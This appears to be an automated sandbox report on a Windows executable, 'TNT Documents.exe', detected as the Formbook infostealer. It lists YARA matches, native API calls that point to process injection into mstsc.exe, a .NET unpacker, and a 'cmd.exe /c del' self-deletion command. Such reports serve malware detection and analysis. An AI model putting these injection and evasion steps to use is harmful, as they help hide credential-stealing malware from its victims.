          Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.289769088.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.360525017.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_00075ED2
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_0236C2B0
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_023699E0
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06B10BE0
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E7CFC8
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E71F09
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E71498
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E70C38
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E72DE8
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E755E8
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E76198
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E79A35
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E7A7E8
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E753F8
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E793D6
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E74F28
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E74F19
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E73CE0
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E760E8
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E748C9
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E73CDF
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E748D8
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E70040
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E70006
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E70C0D
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E75408
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E755D8
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E72DAA
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E719A8
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E72D81
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E75160
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E76155
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E75150
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E7AD08
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_0007958F
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_00074D8E
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 5_2_00135ED2
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 5_2_0013958F
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 5_2_00134D8E
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_00401030
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_00408C8B
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_00408C90
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_00402D87
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_00402D90
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_00402FB0
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_00AA5ED2
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0155F900
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01574120
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0162E824
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01611002
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_016228EC
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0156B090
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_016220A8
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_015820A0
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01622B28
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0161DBD2
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0158EBB0
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_016222AE
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01621D55
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01622D07
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01550D20
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0156D5E0
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_016225DD
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01582581
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0161D466
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0156841F
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01621FF1
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0162DFCE
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01576E30
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0161D616
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01622EF7
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_00AA4D8E
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_00AA958F
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_05681D55
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_05682D07
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055B0D20
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_056825DD
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055CD5E0
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055E2581
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_0567D466
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055C841F
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_05681FF1
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055D6E30
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_0567D616
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_05682EF7
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055BF900
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055D4120
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_05671002
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_056828EC
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_056820A8
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055CB090
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055E20A0
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_05682B28
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_0567DBD2
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055EEBB0
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_056822AE
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_03312FB0
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_03312D90
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_03312D87
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_03318C90
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_03318C8B
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: String function: 0155B150 appears 35 times
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 055BB150 appears 35 times
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_004185F0 NtCreateFile,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_004186A0 NtReadFile,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_00418720 NtClose,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_004187D0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_004185EA NtCreateFile,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_00418642 NtReadFile,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0041869A NtReadFile,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_004187CB NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_015999A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_015998F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_015995D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_015997A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_015996E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_015999D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0159B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_015998A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0159A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599A10 NtQuerySection,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599560 NtWriteFile,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0159AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_015995F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0159A770 NtOpenThread,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599760 NtOpenProcess,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0159A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_01599610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_015996D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055FAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055FA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055FA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055FB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055FA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_055F9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_03328720 NtClose,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_033287D0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_033286A0 NtReadFile,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_033285F0 NtCreateFile,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_033287CB NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_03328642 NtReadFile,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_0332869A NtReadFile,
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_033285EA NtCreateFile,
          Source: TNT Documents.exe, 00000000.00000000.252292198.00000000000EE000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
          Source: TNT Documents.exe, 00000000.00000002.300957032.0000000006DC0000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs TNT Documents.exe
          Source: TNT Documents.exe, 00000000.00000002.294580237.00000000026F2000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs TNT Documents.exe
          Source: TNT Documents.exe, 00000000.00000002.297323666.0000000003389000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameMajorRevision.exe< vs TNT Documents.exe
          Source: TNT Documents.exe, 00000000.00000002.294032469.0000000002381000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameBunifu.UI.dll4 vs TNT Documents.exe
          Source: TNT Documents.exe, 00000005.00000000.280071270.00000000001AE000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
          Source: TNT Documents.exe, 00000007.00000000.286422780.0000000000B1E000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
          Source: TNT Documents.exe, 00000007.00000002.362999077.0000000003523000.00000040.00020000.sdmp | Binary or memory string: OriginalFilenamemstsc.exej% vs TNT Documents.exe
          Source: TNT Documents.exe, 00000007.00000002.362181801.00000000017DF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs TNT Documents.exe
          Source: TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs TNT Documents.exe
          Source: TNT Documents.exe | Binary or memory string: OriginalFilenamekvhWV10.exe8 vs TNT Documents.exe
          Source: TNT Documents.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: TNT Documents.exe | ReversingLabs: Detection: 46%
          Source: TNT Documents.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\TNT Documents.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Users\user\Desktop\TNT Documents.exe "C:\Users\user\Desktop\TNT Documents.exe"
          Source: C:\Users\user\Desktop\TNT Documents.exe | Process created: C:\Users\user\Desktop\TNT Documents.exe {path}
          Source: C:\Users\user\Desktop\TNT Documents.exe | Process created: C:\Users\user\Desktop\TNT Documents.exe {path}
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Windows\SysWOW64\mstsc.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TNT Documents.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TNT Documents.exe | Process created: C:\Users\user\Desktop\TNT Documents.exe {path}
          Source: C:\Users\user\Desktop\TNT Documents.exe | Process created: C:\Users\user\Desktop\TNT Documents.exe {path}
          Source: C:\Windows\SysWOW64\mstsc.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TNT Documents.exe"
          Source: C:\Users\user\Desktop\TNT Documents.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TNT Documents.exe.log
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@9/1@10/4
          Source: C:\Users\user\Desktop\TNT Documents.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:120:WilError_01
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\TNT Documents.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: TNT Documents.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: TNT Documents.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: TNT Documents.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wntdll.pdbUGP source: TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TNT Documents.exe, TNT Documents.exe, 00000007.00000002.361409248.0000000001530000.00000040.00000001.sdmp, TNT Documents.exe, 00000007.00000002.361759586.000000000164F000.00000040.00000001.sdmp, mstsc.exe, mstsc.exe, 00000011.00000002.524903670.0000000005590000.00000040.00000001.sdmp, mstsc.exe, 00000011.00000002.525561940.00000000056AF000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdbGCTL source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp
          Source: Binary string: mstsc.pdb source: TNT Documents.exe, 00000007.00000002.362758177.0000000003400000.00000040.00020000.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: TNT Documents.exe, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.TNT Documents.exe.70000.0.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.TNT Documents.exe.70000.0.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.TNT Documents.exe.130000.1.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.TNT Documents.exe.130000.2.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.TNT Documents.exe.130000.0.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.2.TNT Documents.exe.130000.0.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.TNT Documents.exe.130000.3.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.2.TNT Documents.exe.aa0000.1.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.0.TNT Documents.exe.aa0000.9.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.0.TNT Documents.exe.aa0000.2.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.0.TNT Documents.exe.aa0000.5.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.0.TNT Documents.exe.aa0000.1.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 7.0.TNT Documents.exe.aa0000.7.unpack, Form1.cs | .Net Code: X312_45 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_00080576 push ebx; iretd
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 0_2_06E70ABA pushfd ; iretd
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 5_2_00140576 push ebx; iretd
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0041B832 push eax; ret
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0041B83B push eax; ret
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0041B89C push eax; ret
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0040825A push ecx; retf
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0040C38A pushfd ; ret
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_00415CC4 push FFFFFFDFh; iretd
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_0041B7E5 push eax; ret
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_00AB0576 push ebx; iretd
          Source: C:\Users\user\Desktop\TNT Documents.exe | Code function: 7_2_015AD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 17_2_0560D0D1 push ecx; ret
